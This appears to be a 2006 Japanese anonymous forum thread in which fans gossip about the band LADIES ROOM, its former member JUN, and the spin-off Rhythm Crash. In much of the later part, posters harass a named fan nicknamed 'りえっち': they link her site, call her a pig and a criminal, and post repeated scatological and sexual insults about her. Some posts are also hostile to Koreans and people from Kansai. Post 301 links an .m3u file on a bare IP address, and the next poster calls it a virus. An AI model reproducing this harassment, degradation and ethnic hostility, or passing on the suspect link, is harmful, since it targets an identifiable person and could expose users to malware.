AVCA-22721 発売中!

RIDER CHIPS「おとなかい?TOUR」 LIVE DVD 6月21日発売!!
2005年に行われた「おとなかい?TOUR」のファイナルの模様(12/9川崎クラブチッタ)
を収めたDVDが発売になります。

264 :伝説の名無しさん:2006/05/23(火) 19:24:39
母ちゃんお腹減ったよ〜。だってお金が無いから自分じゃ何も買えないんだよー、、

265 :伝説の名無しさん:2006/05/23(火) 19:40:34
まったく40にもなって親に甘えて
だから言ったろ!
バンド辞めて就職しなって!

266 :伝説の名無しさん:2006/05/24(水) 02:57:06
ジヨージ温泉かぁ。

267 :伝説の名無しさん:2006/05/24(水) 11:02:40
そんな金よくあるね

268 :伝説の名無しさん:2006/05/24(水) 12:03:18
貢がせてるからあるんじゃんw本人曰く「嫁」からなww

269 :伝説の名無しさん:2006/05/24(水) 12:07:17
なんちゃって嫁wwww

270 :伝説の名無しさん:2006/05/24(水) 18:03:08
何でなんちゃってなの?

271 :伝説の名無しさん:2006/05/24(水) 18:40:42
COLORスレでもジョージは人気だね!!www

272 :伝説の名無しさん:2006/05/24(水) 19:04:30
確かにジョージは不謹慎。ww

273 :伝説の名無しさん:2006/05/24(水) 19:14:00
Gブログにコメント入れられるようになったんだね。
皆さん荒らさないように頼みますね。

274 :伝説の名無しさん:2006/05/24(水) 20:35:05
アマゾンでCD&ビデオ買えるんだね
何買おうかな

275 :伝説の名無しさん:2006/05/25(木) 06:40:18
買わなくていいよ

276 :伝説の名無しさん:2006/05/25(木) 08:35:12
レディースルームのジョージ大っ嫌い!!

277 :伝説の名無しさん:2006/05/25(木) 08:37:07
レディースルームのNAO大っ好き!!!

278 :伝説の名無しさん:2006/05/25(木) 09:43:42
ジョージも百も阿保だかん
酒の話しかねぇ いつもネタが同じ
くだらねぇ人間だなぁ

279 :伝説の名無しさん:2006/05/25(木) 11:00:37
だよねW

280 :伝説の名無しさん:2006/05/25(木) 11:25:54
百ちゃん大好きだ!!

281 :伝説の名無しさん:2006/05/26(金) 10:14:21
278
>>ほんとな!ウケるまじ、ジョージと百ってホントに暇人なんだなw酒の話しってマジおやじ杉wミュージシャンの言う事じゃねぇなwってかミュージシャンじゃねぇかっw飲んだくれオヤジかっwイイ年こいてみっともねww

282 :伝説の名無しさん:2006/05/26(金) 13:07:19
>>280

283 :伝説の名無しさん:2006/05/26(金) 14:05:35
↑どこが好きなの?

284 :伝説の名無しさん:2006/05/26(金) 14:40:45
エロかわいいところ!

285 :伝説の名無しさん:2006/05/26(金) 15:03:24
バカだw

286 :伝説の名無しさん:2006/05/26(金) 15:29:02
バカですww

287 :伝説の名無しさん:2006/05/26(金) 15:59:59
納得ですw

288 :伝説の名無しさん:2006/05/26(金) 16:01:19
だいたい3人で回してんなココ
週末5〜6人で
PCはクッキー切れよ
丸見えアナル

289 :伝説の名無しさん:2006/05/26(金) 17:42:34
少なっ!www

290 :伝説の名無しさん:2006/05/26(金) 18:38:41
JUN音出ししてるって!
最新写真もアップしてあるブログ見っけたぜ!
元気そうで良かった!髪の毛の長さは百ぐらいかな

291 :伝説の名無しさん:2006/05/26(金) 19:07:15
>>290
マジっ!!それどこのブログ?

292 :伝説の名無しさん:2006/05/26(金) 21:08:23
NAOブログはありませんか?

293 :伝説の名無しさん:2006/05/26(金) 21:41:36
http://ip.tosp.co.jp/i.asp?i=SUINANDANGERS

294 :伝説の名無しさん:2006/05/26(金) 23:14:52
>>293
水難デンジャーズ?

295 :伝説の名無しさん:2006/05/27(土) 09:32:18
誰にでも言ってる「嫁」からこずかいもらってるって、もし嫁って言って貰ってる人が「つき合ってるってる」って言ってもまたどうせ「つき合ってません!」とか言うんでしょ?
そんなGにお金なんて渡したってGの心には何も響かない・・・。
自分が生きるので精一杯で女を利用する事なんかなんとも思っちゃいないから。


296 :伝説の名無しさん:2006/05/27(土) 09:53:36
>>295
日本語でおk

297 :伝説の名無しさん:2006/05/27(土) 12:00:51
>>295
だってGさんは女を「モノ」としか思ってませんからぁ〜〜〜〜〜w最悪〜

298 :伝説の名無しさん:2006/05/27(土) 13:49:07
お金を渡すのも自己責任。お金もらって恨まれるのも自己責任。

299 :伝説の名無しさん:2006/05/27(土) 13:59:41
渡す事なんかあんの?

300 :伝説の名無しさん:2006/05/27(土) 17:02:07
ないないw

301 :伝説の名無しさん:2006/05/27(土) 17:05:44
http://203.131.199.131:8020/vipb29.m3u

302 ::2006/05/27(土) 18:42:16
ウイルスツマンネ

303 :伝説の名無しさん:2006/05/27(土) 18:58:32
G更新したんだなw夜露死喰

304 :伝説の名無しさん:2006/05/27(土) 19:14:32
プファーw

305 :伝説の名無しさん:2006/05/27(土) 20:49:40
リズクラ終わってる

306 :伝説の名無しさん:2006/05/28(日) 01:17:02
↑何を今更…

307 :伝説の名無しさん:2006/05/28(日) 08:58:29
Gネタなんかどうでもよかよ!
J情報ねーの?>>290それ!どこ?
プライベ満載っちゅーやつ?

308 :伝説の名無しさん:2006/05/28(日) 09:34:50
>>307
見たけど…Jの後輩かなんかがやってるやつ。
Jもコメントしててかなりびっくりした!!
音楽的な記事や画像だけはスゴく良かったよ!
ワンフもイイ子しかこないみたいだし。

しかし、いきなり意味不明な餓鬼ネタんなってwwはっ!?なに!?タイトルと違わない!?
せっかくイイのに台無しのごちゃまぜ。
ご法度だらけで管理はNGが分かってないみたいw
ミュージシャンのブログではないよ!

309 :伝説の名無しさん:2006/05/28(日) 09:41:48
まじかよ!!

310 :伝説の名無しさん:2006/05/28(日) 11:15:04
>>308それってJのOKとってんのかね?
Jコメント出すならとってんのか?

311 :伝説の名無しさん:2006/05/28(日) 11:34:49
>>310
OKどころか、チャットも参加してたし

しばらく見ない内に、パス制になってた

312 :伝説の名無しさん:2006/05/28(日) 11:44:33
荒らされる前にPASS制にしたんでしょ

313 :伝説の名無しさん:2006/05/28(日) 11:52:06
↑大正解。

314 :伝説の名無しさん:2006/05/28(日) 12:08:15
JUNが元気そうでよかったよ!!!

315 :伝説の名無しさん:2006/05/28(日) 12:16:35
>>307
だって管理は素人でしょ
なにが良くってなにがNGか分かってないんだよ
べつにJはミュージシャンとしてじゃなくって友達
として参加してただけなんじゃん?


316 :伝説の名無しさん:2006/05/28(日) 12:46:21
病気説が消えただけでもよしとしようよ

317 :伝説の名無しさん:2006/05/28(日) 13:59:29
NAOの宗教説は?

318 :伝説の名無しさん:2006/05/28(日) 14:23:40
とにかくJUNが元気で音楽活動してることがうれしい。どんなジャンルなのかな〜

319 :伝説の名無しさん:2006/05/28(日) 15:54:25
AMERICAN ROCK!!?

320 :伝説の名無しさん:2006/05/29(月) 02:29:56
>>308
Jファンはストーカーまがいの香具師多いもんね。
そういう香具師らが入ってくれないように管理の人には頑張ってもらいたい

321 :伝説の名無しさん:2006/05/29(月) 03:19:55
>>319
橋幸夫

322 :伝説の名無しさん:2006/05/29(月) 05:50:12
>>320同感。ガムバッテくれ管理君。

323 :伝説の名無しさん:2006/05/29(月) 17:14:28
誰かDVD観た〜?

324 :伝説の名無しさん:2006/05/29(月) 22:58:52
見たよ!ところでJUNの唄ってる曲ってLADIESの?

325 :伝説の名無しさん:2006/05/29(月) 23:21:34
LADIESの動画見れるサイトってない?

326 :伝説の名無しさん:2006/05/30(火) 00:08:18
BARKSで見れるよ

327 :伝説の名無しさん:2006/05/30(火) 09:41:13
>>326
>>325さんじゃないけどサンクス
見てきたよ
10年くらい前にファンだったんだけどみんなおっさんになったなー


328 :伝説の名無しさん:2006/05/30(火) 14:11:47
そりゃ歳もとるだろ

329 :伝説の名無しさん:2006/05/30(火) 18:47:52
リズムクラッシュ解散しちゃえば?意味ないっしょ

330 :伝説の名無しさん:2006/05/31(水) 11:15:15
禿バンド(Vo・B)

331 :伝説の名無しさん:2006/05/31(水) 12:10:41
なななんて事言うんだ…

332 :伝説の名無しさん:2006/05/31(水) 12:29:46
NAO 可愛いよ NAO

333 :伝説の名無しさん:2006/05/31(水) 15:01:01
どういうとこが?

334 :伝説の名無しさん:2006/05/31(水) 23:18:46
草g剛なとこが?

335 :伝説の名無しさん:2006/05/31(水) 23:48:13
JUNカッコいい

336 :伝説の名無しさん:2006/06/01(木) 08:16:17
>>334
草g直史おんぎたあ

337 :伝説の名無しさん:2006/06/01(木) 09:39:36
BASS は〜げ〜

338 :伝説の名無しさん:2006/06/02(金) 17:02:14
リズムクラッシュ。なにが駄目ってVoが音痴杉。
ほんとのリズムクラッシュ。

339 :伝説の名無しさん:2006/06/02(金) 17:30:25
↑言っちゃったw

340 :伝説の名無しさん:2006/06/02(金) 18:13:35
皆 実際言わないだけw

341 :伝説の名無しさん:2006/06/02(金) 20:02:17
レディースルームのPV集って売ってますか?

342 :伝説の名無しさん:2006/06/02(金) 20:43:38
最近、ここ落ち着いたね〜
…塚、ここに来てた椰子も激減か?
悪口も言われてるうちが華だよな。


343 :伝説の名無しさん:2006/06/02(金) 21:08:26
もうみんな興味ないんだよ…
所詮リズクラだから

344 :伝説の名無しさん:2006/06/02(金) 21:45:17
PV集っていうかソニー時代のビデオはオクで入手可能。

345 :伝説の名無しさん:2006/06/02(金) 23:05:46
1000円でも高いわな

346 :伝説の名無しさん:2006/06/03(土) 01:40:57
>>343
みんなって誰?
もともと少人数で回してる摺れじゃん?

347 :伝説の名無しさん:2006/06/03(土) 07:49:02
>>346オマイみたいなヤシw

348 :伝説の名無しさん:2006/06/03(土) 14:02:43
ぷぷぷ

349 :伝説の名無しさん:2006/06/05(月) 11:31:37
草 剛は某掲示板で「キムチハゲ」という愛称で親しまれてます。

350 :伝説の名無しさん:2006/06/05(月) 23:15:21
うぅ〜「噂」を信じちゃいけないよ!

351 :伝説の名無しさん:2006/06/06(火) 05:13:24
わたしの心はウブなのさ

352 :伝説の名無しさん:2006/06/06(火) 15:15:48
その次なんだっけか?

353 :伝説の名無しさん:2006/06/06(火) 18:09:59
タイムマシンにぃ〜、お〜願い〜〜♪

354 :伝説の名無しさん:2006/06/06(火) 19:33:14
山本譲二

355 :伝説の名無しさん:2006/06/06(火) 19:45:23
秋山ジョージ

356 :伝説の名無しさん:2006/06/06(火) 19:57:09
高橋ジョージ。w

357 :伝説の名無しさん:2006/06/07(水) 18:10:06
ところで百ちゃんは声変わりしたの?
今もキンキン声なのかなぁ〜。
気になる。
すご〜く気になる。
切実に気になる。

358 :伝説の名無しさん:2006/06/07(水) 19:29:58
本人に直接聞けば?w

359 :伝説の名無しさん:2006/06/08(木) 10:58:49
何を?どうしてそんなに音痴なのかって?

360 :伝説の名無しさん:2006/06/08(木) 13:07:24
最近のCD聞けばいいじゃん

361 :伝説の名無しさん:2006/06/14(水) 00:05:26
http://ip.tosp.co.jp/Kj/Tospi200.asp?I=rie3453&P=0&Kubun=V5

なんだかね・・・
潤氏使って自分のバンドの宣伝すなや!
ちなみに上の管理人さんのことじゃないよ。ここの管理人さんはすき。
blogの椰子ね!

362 :伝説の名無しさん:2006/06/14(水) 00:50:00
漏れはむしろ、潤がいや。
集まってるファンの子たち、よく我慢してるよね。

363 :伝説の名無しさん:2006/06/14(水) 09:41:08
362の人よ。つか、J氏はもうレディースじゃねえ訳だしガタガタぬかすな

364 :伝説の名無しさん:2006/06/14(水) 11:09:51
>>361
ip.tosp.co.jp ←うざいのはこっちだろw
知り合いでもないのに勝手にやってんだかんなw


365 :伝説の名無しさん:2006/06/14(水) 11:26:02
JUNさんいい様に使われてるの?

366 :伝説の名無しさん:2006/06/14(水) 11:27:01
私はむしろ>>362オマイがいや。w
「集まってるファンの子たち、よく我慢してるよね」って?????????
いやだったら集まらないしw
意味不明ww

367 :伝説の名無しさん:2006/06/14(水) 11:29:07
確蟹ww

368 :伝説の名無しさん:2006/06/14(水) 11:30:38
>>362
コイツあたまノータリンでーすwwww

369 :伝説の名無しさん:2006/06/14(水) 11:46:30
JUN大好きー!早く活動してほすぃ…

370 :伝説の名無しさん:2006/06/14(水) 12:24:11
リズクラもなんも発表ないよね
またドラムやってくれる人探してんだろね。
ミジメ。。。リズクラ。。。


371 :伝説の名無しさん:2006/06/14(水) 13:07:22
誘ったとこで誰もやりたがらないだろーよw

372 :伝説の名無しさん:2006/06/14(水) 13:24:08
つか今後レディースは三人で活動してくってあったよな?

373 :伝説の名無しさん:2006/06/14(水) 13:43:26
でも実際はムリなんでしょ!だからガーゴイルのドラムに頼んだんじゃん!
めっちゃくっちゃの恥ずかしいイベントをさw

374 :伝説の名無しさん:2006/06/14(水) 14:03:17
ほんとだよww口だけ

375 :伝説の名無しさん:2006/06/14(水) 14:32:06
あのブログ見れないんだけど

376 :伝説の名無しさん:2006/06/14(水) 15:17:06
腐女子が集まるスレはココですか?

377 :伝説の名無しさん:2006/06/14(水) 15:21:26
**** 朝鮮人が押し寄せちゃうよ!北朝鮮人権法案が13日に通っちゃうよ! ****

ワールドカップに隠れて天下の悪法、成立間近!!!!

【政治】"「脱北者」支援などを加える" 「北朝鮮人権法案」を一本化…自民、民主が基本合意(N速+現行スレ)

メールするなり、知り合いに教えるなり、身近なとこからやっていこー

378 :伝説の名無しさん:2006/06/14(水) 15:51:42
JUN氏。ゴキブリ駆除以降は人気また復活したのに
LADIESに復活してくれないかなー?

379 :伝説の名無しさん:2006/06/14(水) 15:58:14
>>357
本当だ!見れねー


380 :伝説の名無しさん:2006/06/14(水) 16:18:53


381 :伝説の名無しさん:2006/06/14(水) 16:27:29


382 :伝説の名無しさん:2006/06/14(水) 16:28:29


383 :伝説の名無しさん:2006/06/14(水) 16:30:22


384 :伝説の名無しさん:2006/06/14(水) 16:39:13


385 :伝説の名無しさん:2006/06/14(水) 16:39:31


386 :伝説の名無しさん:2006/06/14(水) 16:40:11


387 :伝説の名無しさん:2006/06/14(水) 16:41:15
か。BY 百w


388 :伝説の名無しさん:2006/06/14(水) 16:50:39
>>378無理無理
汚臭ゴキ親子の話題は禁止だぞよww!
LADIESが崩壊されたようにLADIESのみならず何もかもが破滅する!!

まっブログの管理人はどっかの事務所と違って対応早いね

389 :伝説の名無しさん:2006/06/14(水) 16:57:14
>>388
大正解!どっかの管理人ねぇ〜ww最悪だよ、あの事務所www

390 :伝説の名無しさん:2006/06/14(水) 17:00:39
ジョージって何やってんのかなあ

391 :伝説の名無しさん:2006/06/14(水) 17:21:32
>>390
SEX!!

392 :伝説の名無しさん:2006/06/14(水) 18:26:20
おまえらミクシィ招待しるお!
捨てアド晒せ

393 :伝説の名無しさん:2006/06/14(水) 19:27:09
うちらがどんだけ想ってたって、JUN氏は彼女に夢中、、、
なんか、むなしくねぇ?
私はばかばかしくってやってらんないと思った。

394 :伝説の名無しさん:2006/06/14(水) 19:35:49
つか、そんな事オマイに関係ねぇだろが。オマイが勝手にそうオモテるだけでJUN氏には関係のない事だかんな

395 :伝説の名無しさん:2006/06/14(水) 19:42:26
関係おおありよぉ!
いくらつぎ込んだことか、、、
全額返金してほしい。

396 :伝説の名無しさん:2006/06/14(水) 19:45:25
Naoまたバカにされてるしw

397 :伝説の名無しさん:2006/06/14(水) 19:48:52
ばかばかしいって思う時点で
自分が虚しいよ。
絶対に私らも>>393>>395相手になんかされないんだからさ。
好きで金つぎ込んだんでしょ。
ただのヒガミは恥ずかしyo。

398 :伝説の名無しさん:2006/06/14(水) 19:53:49
>>396
何が?くさなぎ君がどうかしたの?

399 :伝説の名無しさん:2006/06/14(水) 19:55:19
かめや

400 :伝説の名無しさん:2006/06/14(水) 19:59:51
あの人のブログって訳の分からない事や自慢が大杉だからイヤ。どういう性格してんの?

401 :伝説の名無しさん:2006/06/14(水) 20:37:02
>>395がははははははっw
 ↑コイシ爆笑wwwwwwwwwwwwww
芸能人相手に一方的な自己マンで金使って
それがソッポ向いたからつぎ込んだ金返せだってよwwww
まじ発言かよっ!!!!
いるんだ――????そんな香具師wwww
 

402 :伝説の名無しさん:2006/06/14(水) 20:54:03
いるみたいだね(笑

403 :伝説の名無しさん:2006/06/14(水) 21:41:13
>>357
ケツの穴のちっちゃい男だよ!
潤氏使って自分のバンドの宣伝するなら、2チャンで晒されることぐらい
想定の上でやれっつーの!!
頭悪杉

404 :伝説の名無しさん:2006/06/14(水) 22:07:45
>>397そういうこったな!
腐女共よ!ひがみはヤメレ。JUNが腐女好きだったのは遠いむかーしの話
だからオマイら腐女は完全スルー
何でもカモーンのGEORGEにしとけ。

405 :伝説の名無しさん:2006/06/14(水) 23:25:41
>>403
確蟹。今まで見てた人(応援してた人)には何の断りもなしかよ。

406 :伝説の名無しさん:2006/06/14(水) 23:34:44
ホントだよ!メールしてもシカトだよ!
JUNのイメージ壊してそれでも後輩かよ?

407 :伝説の名無しさん:2006/06/14(水) 23:46:16
後輩っつってもJUNさんを利用してただけだしね。
あのやさしいJUNさんがあんな糞に利用されてるなんて悪寒が

408 :伝説の名無しさん:2006/06/15(木) 00:40:28
そんな言わなくても…
いいブログだったよ

409 :伝説の名無しさん:2006/06/15(木) 00:48:10
>>408
所詮、JUN氏のネタがなきゃ誰も振り向かないブログじゃん。
いっそJUN氏ファンサイトとして復活させたらいいのに。
糞のバンド活動にはだ〜れも興味ないけどw

410 :伝説の名無しさん:2006/06/15(木) 13:12:13
レデースロームのファソの
おにゃのことHしたいなー

411 :伝説の名無しさん:2006/06/15(木) 14:50:42
↑↑↑いいのが居ますゼw「りえっち」とかいうキモイ雌豚がすぐにヤらせてくれるよ。それでもよければ…多分どこかのライブハウスに行きゃ居るんじゃね?wwww

412 :伝説の名無しさん:2006/06/15(木) 16:33:21
>>411
マジネタ言っちゃダメだよーw

413 :伝説の名無しさん:2006/06/15(木) 17:00:38
リえっちキタ━━━━━━━━━━!! !!

414 :伝説の名無しさん:2006/06/15(木) 17:34:37
ここ書き込んでんの殆どがそのりえっちとかいう女なんだろ?自演大杉じゃね?

415 :伝説の名無しさん:2006/06/15(木) 19:00:54
りえっち…

416 :伝説の名無しさん:2006/06/15(木) 19:32:17
自演乙。

417 :伝説の名無しさん:2006/06/15(木) 22:18:19
執拗にりえっち叩きしてるのは糞か?
お門違いもいいとこ。さっさとJUNファンサイト復活させなさい!

418 :伝説の名無しさん:2006/06/15(木) 22:21:55
>>406
メール返事きた?

419 :伝説の名無しさん:2006/06/15(木) 23:33:30
>>415
芋臭せー名だなーw

420 :伝説の名無しさん:2006/06/15(木) 23:54:52
芋臭いってwww
久々聞いた響きでワロタ

421 :伝説の名無しさん:2006/06/16(金) 09:33:45
>>420
だな
どこの田舎者かとオモタ

422 :伝説の名無しさん:2006/06/16(金) 11:09:48
りえっちの人気に嫉妬

423 :伝説の名無しさん:2006/06/16(金) 11:24:39
>>422出たよw
ブログの香具師に嫉妬してんのは芋ねーちゃんのほうだろ
普通の香具師がみたら明らかだぜw

例のブログは潤氏の知り合い、芋ねーちゃんはまったくの無許可
相手にされないどころかウザがられてる始末w

Gもいつも言ってんだろー「しつこい糞女ウゼー」って
いろんなコツやらかしてっから悪評高杉

424 :伝説の名無しさん:2006/06/16(金) 11:27:25
マジレスいい?

芋ねーちゃんて古くね?

425 :伝説の名無しさん:2006/06/16(金) 11:45:17
>>422
そう言えばG言ってたね!
仮病使って引きずられてった時に(爆)
つかさ、どでもいいファソの話したってしかたないか?w
また調子乗っちゃうよーーーーー

426 :伝説の名無しさん:2006/06/16(金) 12:02:15
http://rarityisnotdead2.blog68.fc2.com/

427 :伝説の名無しさん:2006/06/16(金) 12:33:07
↑そうやってまた出すなよ。この人ら確かに甘いトコかなりあったけどそれなりに頑張ってなんとか改善しようとしてたんじゃねーの?カワイソじゃん。閉鎖しちまったし

428 :伝説の名無しさん:2006/06/16(金) 13:17:48
そっとしておいてあげようぜよぉ

429 :伝説の名無しさん:2006/06/16(金) 13:19:25
まぁ、あのリエッチとかいうクソバカ女の責任っちゅう事で

430 :伝説の名無しさん:2006/06/16(金) 16:11:18
つか>>361がここの管理人さんは好きだよとかいっちゃって貼りつけるからこんな流れなんじゃね?

ブログのアドだけ貼ればいいのに…確信犯だなwww

431 :伝説の名無しさん:2006/06/16(金) 16:14:25
だからこいつ→>>361がりえっちとか言うブタ女なんだけど。全てこのクソ女のせい

432 :伝説の名無しさん:2006/06/16(金) 16:56:29
http://ip.tosp.co.jp/Kj/Tospi510.asp?I=rie3453&P=0&Sd=1035297&BPG=I
りえっちにAccessしよう

433 :伝説の名無しさん:2006/06/16(金) 17:19:46
残念w
完敗だね!芋ね―ちゃんw

434 :伝説の名無しさん:2006/06/16(金) 18:46:52
芋ねーちゃんの人気に嫉妬

435 :伝説の名無しさん:2006/06/16(金) 22:15:05
何があったのか 誰か簡単に教えて下さい。

436 :伝説の名無しさん:2006/06/16(金) 22:23:10
うんうん 気になる

437 :伝説の名無しさん:2006/06/16(金) 22:48:59
>>430
うんうん。冷静に見て、りえっちさんは全然悪くない。
悪いのは>>361
りえっちさんがここにアド貼るメリットなんかなんもないじゃん。
りえっちさんが一番の被害者だよ

438 :伝説の名無しさん:2006/06/16(金) 23:14:47
被害者だと思ってんなら伏字位すれば?
って釣られたかしらw

439 :伝説の名無しさん:2006/06/17(土) 01:39:17
つか、今回の件でよくわかったのはJUNサンファンの2面性だよねw
某BLOGでのいい子ちゃんぶりと、り○っちさんに対する攻撃っぷりと、、、

すげー裏表なくね?
こえええ〜

440 :伝説の名無しさん:2006/06/17(土) 07:47:11
ファソなんか皆そんなもんだよ

441 :伝説の名無しさん:2006/06/17(土) 09:32:04
っていうかこの件は全て「りえっち」の自演なんですけど。自分トコのブログに来させようと必死wやり方キタナイネ。

442 :伝説の名無しさん:2006/06/17(土) 09:55:36
とにかく、うp

443 :伝説の名無しさん:2006/06/17(土) 09:59:25
>>440
そう。オフィでも散々いい子ちゃんぶってw
亀家ブログのこっぱずかしいコメントなんか見ると、
ま!よくいけしゃーしゃーとあんなの書けると感心しきりだわさw
異常に口汚いくせに麺のいる所じゃみんないい子ぶる習性なんだよw
確実に麺もここ見てんのにね!

444 :伝説の名無しさん:2006/06/17(土) 10:12:24
>>437いや。犯罪者だよ。
盗撮した写真載せてたんだから。

445 :伝説の名無しさん:2006/06/17(土) 11:14:37
>>441塚、ブログなんてやってね〜し。藻舞こそ叩くのに必死だな。

>>444写真て鹿鳴で撮ったのだし。だから盗撮ではない。
でも肖像権とかあるんだろうからサイトに写真載せるのはイクナイかもな。


446 :伝説の名無しさん:2006/06/17(土) 11:47:39
>>437
お前も犯罪者だから庇うんだろ?wお前りえっちじゃねーの?そんなに注目されたいのか?w

447 :伝説の名無しさん:2006/06/17(土) 11:49:26
>>444
そうそう。マジで訴えられるの確実。ヤバイよ、あの女。

448 :伝説の名無しさん:2006/06/17(土) 12:08:09
>>445
本人に許可なく撮ってるんだから盗撮。
盗み撮り。ま、自分で楽しんでるだけにすればいいのに公開しちゃったらね〜
立派な犯罪ですから。

449 :伝説の名無しさん:2006/06/17(土) 12:16:04
>>437
この人りえっちだから。ww自分とこ注目されたいからって自演しちゃダメだよw

450 :伝説の名無しさん:2006/06/17(土) 12:18:03
あー、自分で書いちゃったのね

451 :伝説の名無しさん:2006/06/17(土) 14:57:49
なるほど しかしりえっちって雌は最悪だな

452 :伝説の名無しさん:2006/06/17(土) 17:25:55
なに?Gの店ってまだ開いてるんだな!潰れてなかったんだ!

453 :伝説の名無しさん:2006/06/17(土) 17:35:35
↑店の前でも通ったか?

454 :伝説の名無しさん:2006/06/17(土) 18:21:21
だってBLACKのスレでそんなような事言ってたぞ?

455 :伝説の名無しさん:2006/06/17(土) 22:37:10
>>449
り○っちさんhp閉めちゃったじゃんよ!
まったくかわいそうに

456 :伝説の名無しさん:2006/06/17(土) 22:41:13
>>443
おふぃも肝いけど、JUN氏ファンの一部の人には負けるよ。
実績あんじゃん?まだ見れるんだっけ?り○っちさんとこ。

457 :伝説の名無しさん:2006/06/18(日) 02:54:29
このバンド100%売れねーよ!
ベース下手過ぎ!素人か?w

458 :伝説の名無しさん:2006/06/18(日) 12:02:47
↑ちょっと待て。下手なのはここのボーカルじゃねーの?今までに聞いた事のない下手さだけど?

459 :伝説の名無しさん:2006/06/18(日) 13:02:25
>>457
どこで聞いた!見た
オデも聞いてみたい

460 :伝説の名無しさん:2006/06/18(日) 13:57:46
↑??◎×∴f△◇□??◎???

461 :伝説の名無しさん:2006/06/18(日) 18:47:52
>>459
国籍どこ?

462 :伝説の名無しさん:2006/06/18(日) 19:46:05
LOCK AND KEYってアルバム買ったんだけど、どの人がJUNなのか分からない。教えて下さい

463 :伝説の名無しさん:2006/06/18(日) 19:49:22
バカじゃね!名前書いてあんじゃん!

464 :伝説の名無しさん:2006/06/18(日) 20:14:50
顔のアップのところです

465 :伝説の名無しさん:2006/06/18(日) 20:37:28
>>462
なぜ解らないのかが解りません

466 :伝説の名無しさん:2006/06/18(日) 20:47:00
いくら延ばした加工の写真だって普通は分かるだろ!アフォか?

467 :伝説の名無しさん:2006/06/19(月) 11:52:14
フムフム…りえっちってあのスゲー嫌われてる女の事だよな?

468 :伝説の名無しさん:2006/06/19(月) 12:46:36
メンバーの吸ってる煙草教えろや

469 :伝説の名無しさん:2006/06/19(月) 13:11:19
↑人にモノを頼む言い方じゃないんじゃない?あんた関西人なんじゃない?ww最悪。

470 :伝説の名無しさん:2006/06/19(月) 13:16:41
教えて下さいや

471 :伝説の名無しさん:2006/06/19(月) 13:33:13
さいや?どういう意味?


472 :伝説の名無しさん:2006/06/19(月) 13:36:35
もう教えてもええんちゃうかい?はよせい

473 :伝説の名無しさん:2006/06/19(月) 13:39:22
H セイラムかマイルドセブン
G パーラメント
N 吸わない  

474 :伝説の名無しさん:2006/06/19(月) 13:42:15
Jは?

475 :伝説の名無しさん:2006/06/19(月) 13:48:22
だってもうLADIESじゃないじゃん。ここリズクラのスレでしょ?ちなみにWinston

476 :伝説の名無しさん:2006/06/19(月) 13:50:14
メンバーって言うから…今はあの三人でしょ?だから私ん中ではLADIESじゃないの

477 :伝説の名無しさん:2006/06/19(月) 13:54:39
…なるほどリズムクラッシュか。いきなりスマソ

478 :伝説の名無しさん:2006/06/19(月) 14:07:05
あれ?Hって禁煙したんじゃなかったっけ?

479 :伝説の名無しさん:2006/06/19(月) 14:16:16
吸ったり吸わなかったりでしょ?

480 :伝説の名無しさん:2006/06/19(月) 14:28:31
>>478
吸ってるトコ見たよ

481 :伝説の名無しさん:2006/06/19(月) 14:37:02
セーラムはライト?マイルドセブンはどの種類かわかりますか?

482 :伝説の名無しさん:2006/06/19(月) 14:49:14
>>467 いいから早く教えろや、糞ババア

483 :伝説の名無しさん:2006/06/19(月) 14:54:38
>>476 いいから早く教えろや、糞ババア

484 :伝説の名無しさん:2006/06/19(月) 15:09:00
>>482>>483
早く死ねカス!


485 :伝説の名無しさん:2006/06/19(月) 15:16:07
>>487 ほいでほいで?

486 :伝説の名無しさん:2006/06/19(月) 15:33:42
私とデートした時は吸わなかったな百タソ

487 :伝説の名無しさん:2006/06/19(月) 15:34:06
あ〜美味いゴキ〜

488 :伝説の名無しさん:2006/06/19(月) 15:42:52
りえっちのウンコ食いたい

489 :伝説の名無しさん:2006/06/19(月) 15:47:26
腐女ゴキブリの悪臭かぎたい

490 :伝説の名無しさん:2006/06/19(月) 15:48:26
りえっちのウンコ食いたい

491 :伝説の名無しさん:2006/06/19(月) 16:01:20
そいえば。。サッカー板にJUN氏の話題があったよ!
どこの板か忘れたけどさ

492 :伝説の名無しさん:2006/06/19(月) 16:08:51
ジュンとサッカーって何の関係あんだ??

493 :伝説の名無しさん:2006/06/19(月) 16:44:50
Jリーグ

494 :伝説の名無しさん:2006/06/19(月) 16:45:52
そのJリーガーがストーカーなんだってさ

495 :伝説の名無しさん:2006/06/19(月) 16:47:10
糞リーガーらしい

496 :伝説の名無しさん:2006/06/19(月) 16:55:30
Jのウンコ食いたい

497 :伝説の名無しさん:2006/06/19(月) 16:57:19
氏ねカスが!Gの9q7f;9c69が…臭い…

498 :伝説の名無しさん:2006/06/19(月) 17:09:14
あんたジョージのなんなのさ!

499 :伝説の名無しさん:2006/06/19(月) 17:24:38
4649番目のセフレww

500 :伝説の名無しさん:2006/06/19(月) 17:53:44
Jのウンコ食いたい

501 :伝説の名無しさん:2006/06/19(月) 17:54:28
りえっちとセックスドライブしたい

502 :伝説の名無しさん:2006/06/19(月) 18:16:46
母さーん、お腹すいたよー

503 :伝説の名無しさん:2006/06/19(月) 18:36:13
>>466
あたしも最初わかんなかったよw

ここの人達関西人嫌いなの??

504 :伝説の名無しさん:2006/06/19(月) 18:36:43
りえっちとセックスドライブしたい

505 :伝説の名無しさん:2006/06/19(月) 18:44:17
かあちゃんゴハン食べたいよお(;_;)

506 :伝説の名無しさん:2006/06/19(月) 18:45:23
スレ汚ね

507 :伝説の名無しさん:2006/06/19(月) 18:57:52
>>489嗅ぎなさいよ
>>496食いなさいよ
>>501しなさいよ

んで、そのストーカーしてるJリーガーって
カワイイカワイイ○○ちゃんの元カレだか?前ダンだか?でしょ!


508 :伝説の名無しさん:2006/06/19(月) 19:14:35
>>507
ふ〜ん、そ〜、よかったね〜wこの糞女が。オマエ自身の事よそで言われてんの知らねーの?w

509 :伝説の名無しさん:2006/06/19(月) 19:16:09
>>507
つかオマエバレてるよw

510 :伝説の名無しさん:2006/06/19(月) 19:33:41
りえっち2号か?w

511 :伝説の名無しさん:2006/06/19(月) 20:20:36
…リズムクラッシュ解散したよ。

512 :伝説の名無しさん:2006/06/19(月) 20:50:45
G情報?

513 :伝説の名無しさん:2006/06/20(火) 08:31:50
じゃあLADIES解散も近いってこと?

514 :伝説の名無しさん:2006/06/20(火) 13:16:58
リズクラはすでに解散済

515 :伝説の名無しさん:2006/06/20(火) 21:56:33
羅犬はやんねー、音源は出さね━。
なら解散してるも同然。

516 :伝説の名無しさん:2006/06/20(火) 22:17:01
>>507
で、そのカワイイカワイイ○○ちゃんて幾つぐらいの人なの?
